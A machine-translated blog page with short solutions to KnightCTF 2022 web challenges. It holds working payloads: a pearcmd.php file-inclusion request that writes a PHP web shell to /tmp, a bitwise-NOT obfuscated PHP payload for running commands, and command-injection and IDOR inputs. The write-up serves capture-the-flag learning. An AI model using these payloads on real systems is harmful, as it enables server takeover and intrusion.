当前位置:网站首页>Knightctf 2022 web section
Knightctf 2022 web section
2022-06-27 14:59:00 【foo_ L】
Do Something Special
The title is very clear ,flag Location given , however # The symbol is considered to be resolved to the front-end route , Therefore, it will not return flag file , So just use url You can get it by coding flaayload:/[email protected]_y%[email protected]_h3r3!
Obsfuscation Isn't Enough
Front end validation :
'if (document.forms[0].username.value == "83fe2a837a4d4eec61bd47368d86afd6" && document.forms[0].password.value == "a3fa67479e47116a4d6439120400b057") document.location = "150484514b6eeb1d99da836d95f6671d.php"'We directly visit 150484514b6eeb1d99da836d95f6671d.php Can
Zero is not the limit
payload:/user/-1
Most Secure Calculator -
payload:cat flag.txt
My PHP Site
use p God blog's bare file contains direct access to getshell
payload:GET /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=system($_GET['cmd'])?>+/tmp/shell.php HTTP/1.1
Most Secure Calculator - 2
No alphanumeric bypass getshell
payload:equation=(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8);
equation=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8B%87%8B);
边栏推荐
- What is the London Silver unit
- Talk about redis transactions
- Vscode uses yapf auto format to set the maximum number of characters per line
- [high concurrency] deeply analyze the callable interface
- Leetcode 724. Find the central subscript of the array (yes, once)
- LVI: feature extraction and sorting of lidar subsystem
- SFINAE
- Multithreading Basics (III)
- 图书管理系统
- Principle Comparison and analysis of mechanical hard disk and SSD solid state disk
猜你喜欢
Integration of entry-level SSM framework based on XML configuration file
Web chat room system based on SSM
Why can't the start method be called repeatedly? But the run method can?
QT 如何在背景图中将部分区域设置为透明
Talk about redis transactions
Talk about redis transactions
Admixture usage document Cookbook
SQL parsing practice of Pisa proxy
ReentrantLock、ReentrantReadWriteLock、StampedLock
Practice of constructing ten billion relationship knowledge map based on Nebula graph
随机推荐
Maximum profit of stock (offer 63)
Redis master-slave replication, sentinel mode, cluster cluster
Pri3d: a representation learning method for 3D scene perception using inherent attributes of rgb-d data
基于Vue+Node+MySQL的美食菜谱食材网站设计与实现
ReentrantLock、ReentrantReadWriteLock、StampedLock
隐私计算FATE-离线预测
SQL parsing practice of Pisa proxy
Make a ThreadLocal (source code) that everyone can understand
Design skills of main function of Blue Bridge Cup single chip microcomputer
Référence forte, faible, douce et virtuelle de threadlocal
What is the London Silver code
反射学习总结
Using redis skillfully to realize the like function, isn't it more fragrant than MySQL?
Teach you how to package and release the mofish Library
隱私計算FATE-離線預測
[daily 3 questions (3)] maximum number of balls in the box
How is the London Silver point difference calculated
[OS command injection] common OS command execution functions and OS command injection utilization examples and range experiments - based on DVWA range
海量数据!秒级分析!Flink+Doris构建实时数仓方案
ReentrantLock、ReentrantReadWriteLock、StampedLock